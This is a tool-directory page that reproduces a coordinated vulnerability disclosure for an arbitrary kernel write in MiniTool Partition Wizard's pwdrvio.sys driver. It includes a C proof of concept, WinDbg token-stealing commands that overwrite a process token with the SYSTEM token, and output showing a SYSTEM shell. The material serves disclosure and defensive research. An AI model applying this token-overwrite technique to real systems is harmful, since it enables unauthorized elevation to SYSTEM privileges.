Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-36981-Kernel-EoP-PoC — Project Date : Feb 2026 / Memory corruption vulnerability within the kernel driver of MiniTool. Demonstrates a debugger-assisted arbitrary kernel write primitive that can be leveraged toward privilege escalation. | Kitploit
Tools/GitHubGitHub/canomer/cve-2026-36981-kernel-eop-poc
Privilege EscalationVulnerability AnalysisExploitationDebuggersFuzzingMalware AnalysisBinary Exploitation
GitHubcanomer/cve-2026-36981-kernel-eop-poc

CVE-2026-36981-Kernel-EoP-PoC

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Project Date : Feb 2026 / Memory corruption vulnerability within the kernel driver of MiniTool. Demonstrates a debugger-assisted arbitrary kernel write primitive that can be leveraged toward privilege escalation.

View Repository
2114 months agoNot yet reviewed

CVE-2026-36981-Kernel-EoP-PoC

Kernel write-what-where condition within the pwdrvio.sys kernel driver of MiniTool. Demonstrates a debugger-assisted arbitrary kernel write primitive that can be leveraged toward privilege escalation.

  • 2026-02-09 Vendor notified
  • 2026-03-05 Vendor acknowledged
  • 2026-03-05 CVE requested from MITRE
  • 2026-05-10 Public disclosure after 90-day coordinated disclosure period

https://github.com/user-attachments/assets/ac81d7ce-0be7-40a5-9334-c54350e6e30e

Arbitrary Kernel Write → Local Privilege Escalation (LPE) Severity: HIGH
CVSS 3.1 Score: 7.8 (LPE) CVSS Vector String:

  • LPE: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

    • debugger-assisted arbitrary kernel write primitive that can be leveraged toward privilege escalation.
    • Exploitable via write-what-where primitive at driver offset 0x1641
    • Requires kernel debugging tools for reliable exploitation
    • Confirmed on Windows 10 Build 19045.6466

Attack Prerequisites:

  • Local access to the target system
  • Standard user account (non-administrator)
  • MiniTool installed or uninstalled (pwdrvio.sys driver loaded)

Exploitation Results: LPE - Debugger-assisted privilege escalation demonstrated (NT AUTHORITY / SYSTEM), complete system compromise

Vulnerability Discovery Timeline

Initial Fuzzing and BSOD Discovery

Date: February 5, 2026
Activity: Systematic kernel driver fuzzing using custom Python fuzzer

Discovery Process:

  1. Target Selection:

    • Enumerated installed kernel drivers on Windows 10 VM
    • Identified pwdrvio.sys as oldest driver (timestamp: June 16, 2009)
    • Driver file: C:\Windows\System32\drivers\pwdrvio.sys
    • Device object: \\.\PartitionWizardDiskAccesser\0
  2. Initial Fuzzing:

    • Developed Python fuzzer using ctypes to interface with driver
    • Sent randomized data via WriteFile/DeviceIoControl to driver device
    • Result: Multiple Blue Screens of Death (BSOD)
  3. Verifier Activation:

    • Enabled Driver Verifier for enhanced crash detection
    root@kitploit:~
    verifier /standard /driver pwdrvio.sys
    

    Verifier Configuration:

    root@kitploit:~
    Verifier Flags: 0x001209bb
    Standard Flags Enabled:
      [X] Special pool
      [X] Force IRQL checking  
      [X] Pool tracking
      [X] I/O verification
      [X] Deadlock detection
      [X] DMA checking
      [X] Security checks
      [X] Miscellaneous checks
      [X] DDI compliance checking
    

WinDbg Kernel Debugging Setup

Date: February 5-6, 2026
Activity: Established kernel debugging environment for root cause analysis

Setup Procedure:

  1. VMware Serial Port Configuration:

    root@kitploit:~
    VMware Workstation Pro → VM Settings
    ├─ Add Hardware → Serial Port
    ├─ Connection: "Use named pipe"
    ├─ Path: \\.\pipe\com_1
    ├─ End: "This is the server"
    └─ I/O Mode: "Yield CPU on poll" ✓
    
  2. Guest OS Configuration:

    root@kitploit:~
    REM Administrator Command Prompt
    bcdedit /debug on
    bcdedit /dbgsettings serial debugport:1 baudrate:115200
    shutdown /r /t 0
    
  3. Host WinDbg Connection:

    root@kitploit:~
    WinDbg → File → Attach to Kernel
    ├─ Port: \\.\pipe\com_1
    ├─ Baud Rate: 115200
    ├─ Pipe: ✓
    └─ Reconnect: ✓
    
    Result: "Kernel Debugger connection established."
    

Root Cause Analysis - Arbitrary Write Discovery

Date: February 6, 2026
Activity: Identified arbitrary kernel write primitive

Analysis Steps:

  1. Module Analysis:

    root@kitploit:~
    1: kd> lm m pwdrvio
    start             end                 module name
    fffff805`315f0000 fffff805`315f8000   pwdrvio  (Jun 16 2009)
    
    1: kd> !drvobj pwdrvio 2
    Driver object (fffff805`XXXXXXXX) is for:
     \Driver\pwdrvio
    
    DriverEntry:   fffff805`315f6008
    DriverUnload:  fffff805`315f1060
    
    Dispatch Routines:
    [00] IRP_MJ_CREATE                      fffff805`315f108c
    [02] IRP_MJ_CLOSE                       fffff805`315f12f8
    [03] IRP_MJ_READ                        fffff805`315f16c4
    [04] IRP_MJ_WRITE                       fffff805`315f1564  ← Target
    [0e] IRP_MJ_DEVICE_CONTROL              fffff805`315f1404
    
  2. Vulnerable Instruction Discovery:

    Set breakpoint on write handler:

    root@kitploit:~
    1: kd> bp pwdrvio+0x1641
    1: kd> g
    
    Breakpoint 0 hit
    pwdrvio+0x1641:
    fffff805`315f1641 498943f0        mov qword ptr [r11-10h],rax
    

    Critical Finding: Arbitrary write primitive identified!

    • Instruction writes kernel pointer (RAX) to address [R11-0x10]
    • R11 is loaded from stack frame: mov r11, qword ptr [rbp+0xB8h]
    • No validation performed on destination address

UAF to Arbitrary Write Analysis

Date: February 6-7, 2026
Activity: Traced vulnerability from User-After-Free to write-what-where condition

Memory Corruption Chain:

  1. IRP Allocation:

    root@kitploit:~
    0: kd> !pool @rbp
    Pool page ffffe60f84c38610 region is Special pool
    *ffffe60f84c38000 size: 1f0 data: ffffe60f84c38e10 (NonPaged) *Irp+
    Pooltag Irp+ : I/O verifier allocated IRP packets
    
  2. Buffer Relationship:

    root@kitploit:~
    0: kd> r rsi
    rsi=ffffe60f828df900  ← User buffer location
    
    0: kd> ? @rbp - @rsi
    Evaluate expression: 35823344 = 00000000`02229ef0  ← 35MB difference!
    

    Analysis: User buffer is NOT directly accessible from RBP frame

    • RBP points to IRP structure in kernel pool
    • User buffer is in different memory region
    • RBP+0xB8 offset does not point into user-controlled buffer
  3. Use-After-Free Condition:

    The driver maintains dangling pointers in the IRP structure:

    root@kitploit:~
    // Ghidra decompilation (pwdrvio+0x1564)
    longlong lVar1 = *(longlong *)(param_2 + 0xb8);  // Load from IRP
    
    // No validation!
    lVar5 = IoBuildAsynchronousFsdRequest(...);
    
    // Write to [lVar1 - 0x10]
    *(code **)(lVar3 + -0x10) = FUN_00011364;  // Arbitrary write!
    

Local Privilege Escalation Development

Date: February 7-8, 2026
Activity: Developed token stealing technique

Exploitation Strategy:

Objective: Overwrite current process token with SYSTEM token

Windows EPROCESS Structure:

root@kitploit:~
+0x000 Pcb              : _KPROCESS
...
+0x4b8 Token            : _EX_FAST_REF  ← Token pointer location

Token Stealing Procedure:

  1. Locate SYSTEM Process:

    root@kitploit:~
    0: kd> !process 4 0
    PROCESS ffffe7875ac86200
        SessionId: none  Cid: 0004    Peb: 00000000
        Image: System
    
    0: kd> dq ffffe7875ac86200+4b8 L1
    ffffe787`5ac866b8  ffffc08e`6642f04f  ← SYSTEM token value
    
  2. Locate Attacker Process:

    root@kitploit:~
    0: kd> !process 0 0 poc1.exe
    PROCESS ffffe78760150080
        SessionId: 1  Cid: 0678
        Image: poc1.exe
    
    0: kd> dq ffffe78760150080+4b8 L1
    ffffe787`60150538  ffffc08e`6c37a066  ← Standard user token
    
  3. Calculate Target Address:

    root@kitploit:~
    Target = TokenPointer + 0x10
           = 0xffffe78760150538 + 0x10
           = 0xffffe78760150548
    
    Reason: Instruction uses [R11-0x10], so:
            (Target + 0x10) - 0x10 = Target
    
  4. Perform Token Overwrite:

    root@kitploit:~
    0: kd> r rax = ffffc08e6642f04f     ; SYSTEM token
    0: kd> r r11 = ffffe78760150548     ; Target address
    0: kd> p                             ; Execute: mov [r11-10h],rax
    
    0: kd> dq ffffe78760150538 L1        ; Verify
    ffffe787`60150538  ffffc08e`6642f04f  ← Token successfully changed!
    
  5. Restore Execution:

    root@kitploit:~
    0: kd> r rip = pwdrvio + 165f    ; Skip to safe return
    0: kd> r eax = 0                  ; Return success
    0: kd> bc *                       ; Clear breakpoints
    0: kd> g                          ; Continue execution
    

Result: Process now has SYSTEM privileges!

Vulnerability #1: Arbitrary Kernel Write Leading to LPE

CWE Classification

  • CWE-787: Out-of-bounds Write
  • CWE-123: Write-what-where Condition
  • CWE-782: Exposed IOCTL with Insufficient Access Control

Vulnerability Details

Location: pwdrvio.sys offset 0x1641
Assembly:

root@kitploit:~
pwdrvio+0x1633:  mov r11, qword ptr [rbp+0xB8h]   ; Load pointer from IRP
pwdrvio+0x1641:  mov qword ptr [r11-10h], rax     ; Arbitrary write!

Trigger Mechanism:

root@kitploit:~
HANDLE hDevice = CreateFileA("\\\\.\\PartitionWizardDiskAccesser\\0",
                            GENERIC_READ | GENERIC_WRITE,
                            0, NULL, OPEN_EXISTING, 0, NULL);

char buffer[0x100];
DWORD bytesReturned;
WriteFile(hDevice, buffer, 0x100, &bytesReturned, NULL);

Exploitation Limitations:

This vulnerability requires kernel debugging tools for reliable exploitation because:

  1. Register Control Challenge:

    • The destination register R11 is loaded from [RBP+0xB8]
    • RBP points to IRP stack frame in kernel pool
    • User buffer is in different memory region (35MB+ offset)
    • Cannot directly control [RBP+0xB8] from user buffer
  2. Pool Memory Layout:

    root@kitploit:~
    RBP (IRP frame):    0xffffe60f84c38610
    User buffer:        0xffffe60f828df900
    Difference:         35,823,344 bytes (35 MB)
    
  3. Required Manual Intervention:

    • Set R11 register to target address via debugger
    • Set RAX register to SYSTEM token value
    • Execute instruction
    • Restore execution flow

CVSS 3.1 Score: 7.8 (HIGH)

Metrics:

  • Attack Vector (AV): Local - Requires local system access
  • Attack Complexity (AC): Low - No special conditions needed
  • Privileges Required (PR): Low - Standard user sufficient
  • User Interaction (UI): None - No user interaction required
  • Scope (S): Unchanged - Same security authority
  • Confidentiality (C): High - Full file system access
  • Integrity (I): High - Complete system modification
  • Availability (A): High - Can crash or disable system

Full Code & Exploitation

Code:

root@kitploit:~
#include <windows.h>
#include <stdio.h>

int main() {
    HANDLE hDevice;
    DWORD bytesReturned;
    char buffer[0x100];

    printf("[*] MiniTool PoC Trigger...\n");
    printf("[*] Current User: "); system("whoami");

    // 1. Connect to the Driver
    hDevice = CreateFileA("\\\\.\\PartitionWizardDiskAccesser\\0", 
                          GENERIC_READ | GENERIC_WRITE, 
                          0, NULL, OPEN_EXISTING, 0, NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Cannot Open Driver! Error: %d\n", GetLastError());
        return 1;
    }

    printf("[+] Connected. WinDbg - BP 1641.\n");
    printf("[!] WinDbg - Token Change - 'g'.\n");
    
    getchar(); // Breakpoint of WinDbg

    // 2. Trigger the Vulnerability (Sending Random Data to Driver)
    WriteFile(hDevice, buffer, 0x100, &bytesReturned, NULL);

    printf("[*] Completed. SYSTEM Shell Opening...\n");

    // 3. If we token is changed - SYSTEM Shell
    system("whoami && cmd.exe");

    return 0;
}

How to Compile:

  • MinGW on Linux
root@kitploit:~
┌──(PC㉿PC)-[/dir]
└─$ x86_64-w64-mingw32-gcc LPE_PoC.c -o LPE_PoC.exe -lntdll -static

WinDbg Process:

  • When our breakpoint triggered
root@kitploit:~
1: kd> bp pwdrvio+0x1641
1: kd> g
Breakpoint 0 hit
Unable to load image pwdrvio.sys, Win32 error 0n2
pwdrvio+0x1641:
fffff805`315f1641 498943f0        mov     qword ptr [r11-10h],rax
1: kd> !process 0 0 poc1.exe
PROCESS ffff9d8f6401f080
    SessionId: 1  Cid: 1948    Peb: 27a2a7000  ParentCid: 16ac
    DirBase: 1b2528000  ObjectTable: ffffc2093fb93140  HandleCount:  58.
    Image: poc1.exe

1: kd> dq ffff9d8f6401f080+4b8 L1
ffff9d8f`6401f538  ffffc209`40117738
1: kd> dq ffff9d8f6401f538 L1
ffff9d8f`6401f538  ffffc209`40117738
1: kd> !process 4 0
Searching for Process with Cid == 4
PROCESS ffff9d8f5f069040
    SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 001aa000  ObjectTable: ffffc2093447ac40  HandleCount: 2517.
    Image: System

1: kd> dq ffff9d8f5f069040+4b8 L1
ffff9d8f`5f0694f8  ffffc209`3441d8df
1: kd> r rax = ffffc2093441d8df
1: kd> r r11 = ffff9d8f6401f538 + 10
1: kd> p
pwdrvio+0x1645:
fffff805`315f1645 488d442440      lea     rax,[rsp+40h]
1: kd> dq ffff9d8f6401f538 L1
ffff9d8f`6401f538  ffffc209`3441d8df
1: kd> r rip = pwdrvio + 0x165f
1: kd> r eax = 0
1: kd> bc *
1: kd> g

Terminal Output:

root@kitploit:~
PS C:\Users\standarduser\directory> whoami # Standard User Identification
PC\standarduser
PS C:\Users\standarduser\directory> whoami /priv # Standard User Privs

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                        State
============================= ================================== ========
SeShutdownPrivilege           Sistemi kapat                      Disabled
SeChangeNotifyPrivilege       Çapraz geçiş denetimini atla       Enabled
SeUndockPrivilege             Bilgisayarı takma biriminden çıkar Disabled
SeIncreaseWorkingSetPrivilege İşlem çalışma kümesini artır       Disabled
SeTimeZonePrivilege           Saat dilimini değiştir             Disabled

PS C:\Users\standarduser\directory> whoami /groups # Standard User Groups

GROUP INFORMATION
-----------------

Group Name                                                Type             SID          Attributes                      
========================================================= ================ ============ ==================================================
Everyone                                                  Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Yerel hesap ve Administrators grubunun üyesi Well-known group S-1-5-114    Group used for deny only        
BUILTIN\Administrators                                    Alias            S-1-5-32-544 Group used for deny only        
BUILTIN\Users                                             Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                  Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
KONSOL OTURUMU AÇMA                                       Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                          Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                            Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Yerel hesap                                  Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                                     Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                          Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Zorunlu Etiket\Orta Zorunlu Düzey                         Label            S-1-16-8192                                  
PS C:\Users\standarduser\directory>

PS C:\Users\standarduser\directory> .\poc1.exe # PoC Execution
[*] MiniTool PoC Tetikleyici Baslatiliyor...
[*] Mevcut Kullanici: desktop-usp1rvs\kali
[+] Surucu baglantisi basarili. WinDbg'da BP 1641 bekleyin.
[!] WinDbg'da Token'i degistirdikten sonra 'g' deyin.

[*] Islem tamamlandi. SYSTEM Shell acilmaya calisiliyor...
nt authority\system
Microsoft Windows [Version 10.0.19045.3803]
(c) Microsoft Corporation. Tüm hakları saklıdır.

C:\Users\standarduser\directory>whoami # Elevated User Identification
nt authority\system

C:\Users\standarduser\directory>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                                     State
========================================= =============================================================================== ========
SeCreateTokenPrivilege                    Belirteç nesnesi oluştur                                                        Disabled
SeAssignPrimaryTokenPrivilege             İşlem düzeyi belirtecini değiştir                                               Disabled
SeLockMemoryPrivilege                     Sayfaları bellekte kilitle                                                      Enabled
SeIncreaseQuotaPrivilege                  İşlem için bellek kotaları ayarla                                               Disabled
SeTcbPrivilege                            İşletim sisteminin parçası gibi davran                                          Enabled
SeSecurityPrivilege                       Denetimi ve güvenlik günlüğünü yönet                                            Disabled
SeTakeOwnershipPrivilege                  Dosyaların veya diğer nesnelerin sahipliğini al                                 Disabled
SeLoadDriverPrivilege                     Aygıt sürücüleri yükle ve kaldır                                                Disabled
SeSystemProfilePrivilege                  Sistem performansı profili oluştur                                              Enabled
SeSystemtimePrivilege                     Sistem saatini değiştir                                                         Disabled
SeProfileSingleProcessPrivilege           Tek işlem profili oluştur                                                       Enabled
SeIncreaseBasePriorityPrivilege           Zamanlama önceliğini artır                                                      Enabled
SeCreatePagefilePrivilege                 Disk belleği dosyası oluştur                                                    Enabled
SeCreatePermanentPrivilege                Kalıcı paylaşılan nesneler oluştur                                              Enabled
SeBackupPrivilege                         Dosya ve dizinleri yedekle                                                      Disabled
SeRestorePrivilege                        Dosya ve dizinleri geri yükle                                                   Disabled
SeShutdownPrivilege                       Sistemi kapat                                                                   Disabled
SeDebugPrivilege                          Programların hatalarını ayıkla                                                  Enabled
SeAuditPrivilege                          Güvenlik denetimleri oluştur                                                    Enabled
SeSystemEnvironmentPrivilege              Üretici yazılımı ortam değerlerini değiştir                                     Disabled
SeChangeNotifyPrivilege                   Çapraz geçiş denetimini atla                                                    Enabled
SeUndockPrivilege                         Bilgisayarı takma biriminden çıkar                                              Disabled
SeManageVolumePrivilege                   Birim bakım görevleri gerçekleştir                                              Disabled
SeImpersonatePrivilege                    Kimlik doğrulamasından sonra istemcinin özelliklerini al                        Enabled
SeCreateGlobalPrivilege                   Genel nesneler oluştur                                                          Enabled
SeTrustedCredManAccessPrivilege           Kimlik Bilgileri Yöneticisi'ne güvenilen arayan olarak eriş                     Disabled
SeRelabelPrivilege                        Nesne etiketini değiştir                                                        Disabled
SeIncreaseWorkingSetPrivilege             İşlem çalışma kümesini artır                                                    Enabled
SeTimeZonePrivilege                       Saat dilimini değiştir                                                          Enabled
SeCreateSymbolicLinkPrivilege             Simgesel bağlantılar oluştur                                                    Enabled
SeDelegateSessionUserImpersonatePrivilege Aynı oturumdaki farklı bir kullanıcı için bir kimliğe bürünme belirteci edinin. Enabled

C:\Users\standarduser\directory>whoami /groups

GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes
==================================== ================ ============ ==================================================
BUILTIN\Administrators               Alias            S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
Zorunlu Etiket\Sistem Zorunlu Düzeyi Label            S-1-16-16384

Proof of Concept & Reproduction Steps

Prerequisites

Test Environment:

  • Operating System: Windows 10 Home Build 19045.6466
  • Architecture: x64
  • MiniTool Version: Partition Wizard 13.5
  • Driver: pwdrvio.sys (dated June 16, 2009)
  • User Account: Standard user (non-administrator)

Required Tools:

  • For LPE: WinDbg (Windows Debugger), VMware Workstation

Reproduction #2: Local Privilege Escalation (WinDbg-Assisted)

Step 1: Setup Kernel Debugging Environment

A. VMware Configuration

  1. Open VM settings in VMware Workstation Pro
  2. Add Hardware → Serial Port
  3. Configure:
    • Connection: "Use named pipe"
    • Named pipe: \\.\pipe\com_1
    • End: "This is the server"
    • Other end: "An application"
    • I/O Mode: ✓ Yield CPU on poll
  4. Save and start VM

B. Guest OS Configuration

root@kitploit:~
REM Administrator Command Prompt in VM
C:\> bcdedit /debug on
The operation completed successfully.

C:\> bcdedit /dbgsettings serial debugport:1 baudrate:115200
The operation completed successfully.

C:\> bcdedit /dbgsettings
debugtype               Serial
debugport               1
baudrate                115200

C:\> shutdown /r /t 0

C. Host WinDbg Setup

  1. Open WinDbg (x64)
  2. File → Kernel Debug (Ctrl+K)
  3. Configure:
    • Tab: COM
    • Port: \\.\pipe\com_1
    • Baud Rate: 115200
    • ✓ Pipe
    • ✓ Reconnect
  4. Click OK

Wait for connection message:

root@kitploit:~
Opened \\.\pipe\com_1
Waiting to reconnect...
Connected to Windows 10 19041 x64 target
Kernel Debugger connection established.

1: kd>

Step 2: Compile Proof of Concept

Save as lpe_poc.c:

root@kitploit:~
#include <windows.h>
#include <stdio.h>

int main() {
    HANDLE hDevice;
    DWORD bytesReturned;
    char buffer[0x100];

    printf("[*] MiniTool pwdrvio.sys LPE PoC\n");
    printf("[*] Current user: ");
    system("whoami");

    // Open driver
    hDevice = CreateFileA("\\\\.\\PartitionWizardDiskAccesser\\0", 
                          GENERIC_READ | GENERIC_WRITE, 
                          0, NULL, OPEN_EXISTING, 0, NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open driver (Error: %d)\n", GetLastError());
        return 1;
    }

    printf("[+] Driver opened successfully\n");
    printf("[!] Waiting for WinDbg manipulation...\n");
    printf("[!] Set breakpoint: bp pwdrvio+0x1641\n");
    printf("[!] Press ENTER when ready...\n");
    
    getchar();  // Wait for WinDbg setup

    // Trigger vulnerability
    WriteFile(hDevice, buffer, 0x100, &bytesReturned, NULL);

    printf("[*] Exploitation complete\n");
    printf("[*] Spawning SYSTEM shell...\n");
    
    // If successful, this CMD will have SYSTEM privileges
    system("whoami && cmd.exe");

    CloseHandle(hDevice);
    return 0;
}

Compile on Linux/WSL:

root@kitploit:~
x86_64-w64-mingw32-gcc lpe_poc.c -o lpe_poc.exe -lntdll -static

Step 3: Execute Exploitation

A. Start PoC in VM (Standard User)

root@kitploit:~
C:\> whoami
desktop-lfkkhu2\standard_user

C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                        State
============================= ================================== ========
SeShutdownPrivilege           Shut down the system               Disabled
SeChangeNotifyPrivilege       Bypass traverse checking           Enabled
SeUndockPrivilege             Remove computer from docking       Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set     Disabled
SeTimeZonePrivilege           Change the time zone               Disabled

[Limited privileges - no SeDebugPrivilege]

C:\> lpe_poc.exe
[*] MiniTool pwdrvio.sys LPE PoC
[*] Current user: desktop-lfkkhu2\standard_user
[+] Driver opened successfully
[!] Waiting for WinDbg manipulation...
[!] Set breakpoint: bp pwdrvio+0x1641
[!] Press ENTER when ready...

[WAIT - Do not press ENTER yet]

B. WinDbg Setup and Manipulation

root@kitploit:~
1: kd> bp pwdrvio+0x1641
1: kd> g

Now press ENTER in the PoC. WinDbg will break:

root@kitploit:~
Breakpoint 0 hit
pwdrvio+0x1641:
fffff802`18b11641 498943f0        mov qword ptr [r11-10h],rax

0: kd> r
rax=fffff80218b11364 rbx=0000000000000000 rcx=ffffe78761218e20
rdx=ffffe7875ff72e10 rsi=ffffe7875dd48f20 rdi=0000000000000000
rip=fffff80218b11641 rsp=ffff9f801c707100 rbp=ffffe7875ff72e10
 r8=0000000000000001  r9=0000000000000000 r10=0000000000000000
r11=ffffe7875ff72f70 r12=0000000000000001 r13=ffffdf0a0c48ecd0
r14=0000000000000000 r15=ffffe78761218e20

C. Locate SYSTEM Process and Token

root@kitploit:~
0: kd> !process 4 0
Searching for Process with Cid == 4
PROCESS ffffe7875ac86200
    SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 001aa000  ObjectTable: ffffc08e66444c80  HandleCount: 2471
    Image: System

0: kd> dq ffffe7875ac86200+4b8 L1
ffffe787`5ac866b8  ffffc08e`6642f04f  ← SYSTEM token value

D. Locate Attacker Process

root@kitploit:~
0: kd> !process 0 0 lpe_poc.exe
PROCESS ffffe78760150080
    SessionId: 1  Cid: 0678    Peb: a520317000  ParentCid: 14b8
    DirBase: 402a29000  ObjectTable: ffffc08e6beb0780  HandleCount: 58
    Image: lpe_poc.exe

0: kd> dq ffffe78760150080+4b8 L1
ffffe787`60150538  ffffc08e`6c37a066  ← Current token (standard user)

E. Perform Token Overwrite

root@kitploit:~
0: kd> r rax = ffffc08e6642f04f
0: kd> r r11 = ffffe78760150538 + 10

0: kd> r r11
r11=ffffe78760150548

0: kd> p
pwdrvio+0x1645:
fffff802`18b11645 488d442440      lea rax,[rsp+40h]

0: kd> dq ffffe78760150538 L1
ffffe787`60150538  ffffc08e`6642f04f  ← Token successfully changed!

F. Restore Execution

root@kitploit:~
0: kd> r rip = pwdrvio + 165f
0: kd> r eax = 0
0: kd> bc *
0: kd> g

C. Verify Privilege Escalation in VM

root@kitploit:~
[*] Exploitation complete
[*] Spawning SYSTEM shell...
nt authority\system

Microsoft Windows [Version 10.0.19045.6466]

C:\> whoami
nt authority\system

C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name                            Description                          State
========================================= ==================================== ========
SeCreateTokenPrivilege                    Create a token object                Disabled
SeAssignPrimaryTokenPrivilege             Replace a process level token        Disabled
SeLockMemoryPrivilege                     Lock pages in memory                 Enabled
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process   Disabled
SeTcbPrivilege                            Act as part of the operating system  Enabled
SeSecurityPrivilege                       Manage auditing and security log     Disabled
SeTakeOwnershipPrivilege                  Take ownership of files/objects      Disabled
SeLoadDriverPrivilege                     Load and unload device drivers       Disabled
SeSystemProfilePrivilege                  Profile system performance           Enabled
SeSystemtimePrivilege                     Change the system time               Disabled
SeProfileSingleProcessPrivilege           Profile single process               Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority         Enabled
SeCreatePagefilePrivilege                 Create a pagefile                    Enabled
SeCreatePermanentPrivilege                Create permanent shared objects      Enabled
SeBackupPrivilege                         Back up files and directories        Disabled
SeRestorePrivilege                        Restore files and directories        Disabled
SeShutdownPrivilege                       Shut down the system                 Disabled
SeDebugPrivilege                          Debug programs                       Enabled  ← SYSTEM!
SeAuditPrivilege                          Generate security audits             Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values   Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking             Enabled
SeUndockPrivilege                         Remove computer from docking         Disabled
SeManageVolumePrivilege                   Perform volume maintenance tasks     Disabled
SeImpersonatePrivilege                    Impersonate a client after auth      Enabled
SeCreateGlobalPrivilege                   Create global objects                Enabled
SeTrustedCredManAccessPrivilege           Access Credential Manager as trusted Disabled
SeRelabelPrivilege                        Modify an object label               Disabled
SeIncreaseWorkingSetPrivilege             Increase a process working set       Enabled
SeTimeZonePrivilege                       Change the time zone                 Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                Enabled
SeDelegateSessionUserImpersonatePrivilege Impersonate other session users      Enabled

C:\> whoami /groups

GROUP INFORMATION
-----------------
Group Name                           Type             SID          Attributes
==================================== ================ ============ =======================================
BUILTIN\Administrators               Alias            S-1-5-32-544 Enabled by default, Enabled, Owner
Everyone                             Well-known group S-1-1-0      Mandatory, Enabled by default, Enabled
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory, Enabled by default, Enabled
Mandatory Label\System Mandatory Level Label          S-1-16-16384 ← SYSTEM integrity!

MiniTool Software:

root@kitploit:~
Product:               MiniTool Partition Wizard
Version:               13.5
Installation Path:     C:\Program Files\MiniTool Partition Wizard
Driver Path:           C:\Windows\System32\drivers\pwdrvio.sys
Driver Date:           June 16, 2009 (0x4A36F8D1)
Driver Size:           32,256 bytes

Testing Tools:

root@kitploit:~
WinDbg Version:        10.0.29507.1001 AMD64
Python Version:        3.x with ctypes
Compiler:              x86_64-w64-mingw32-gcc (MinGW)
Verifier:              Windows Driver Verifier (Standard flags)

Affected Versions

Confirmed Vulnerable

Primary Product:

  • MiniTool Partition Wizard 13.5
  • All previous versions using pwdrvio.sys

Driver Details:

root@kitploit:~
File Name:          pwdrvio.sys
File Version:       [Not available]
File Size:          32,256 bytes (31.5 KB)
Time Stamp:         0x4A36F8D1 (June 16, 2009, 04:43:45 UTC)
Digital Signature:  [Signed by vendor]
Device Name:        \\.\PartitionWizardDiskAccesser\0
Service Name:       pwdrvio
Load Order:         Boot Start (SERVICE_BOOT_START)

Potentially Affected

Other MiniTool products that may use the same driver:

  • MiniTool Power Data Recovery
  • MiniTool Partition Wizard Bootable Edition
  • MiniTool ShadowMaker

Note: Each product should be tested individually for confirmation.

Operating System Compatibility

Tested and Confirmed Vulnerable:

  • Windows 10 Home Build 19045.6466 (x64)

Reason: Driver is compatible with all modern Windows versions and contains no version-specific checks.

Legal Disclaimer

This repository is provided strictly for educational, defensive security research, and vulnerability reproduction purposes in controlled laboratory environments. The information and proof-of-concept code are intended to help defenders, researchers, and vendors understand and remediate the reported vulnerability. Unauthorized or malicious use of this code against systems without explicit permission may violate applicable laws and regulations. The author does not encourage or condone illegal activity and assumes no liability for misuse or damage caused by this material.

This vulnerability disclosure report is provided for:

  1. Security research and education
  2. Vendor notification and patch development
  3. Protection of end users
  4. Academic and defensive security purposes

Prohibited Uses:

  • Unauthorized access to computer systems
  • Malicious exploitation
  • Any illegal activity

The researcher conducted all testing on personally owned systems in controlled environments. No unauthorized access to third-party systems was performed.

Report Version: 1.0
Last Updated: February 9, 2026

Download Tool
  • Register State Analysis:

    root@kitploit:~
    0: kd> r
    rax=fffff805315f1364  ← Kernel code pointer
    r11=ffffe60f84c38750  ← Destination address (controlled via stack)
    rbp=ffffe60f84c38610  ← IRP stack frame
    
    0: kd> dq @rbp+0xB8 L1
    ffffe60f`84c386c8  ffffe60f`84c38750  ← R11 loaded from here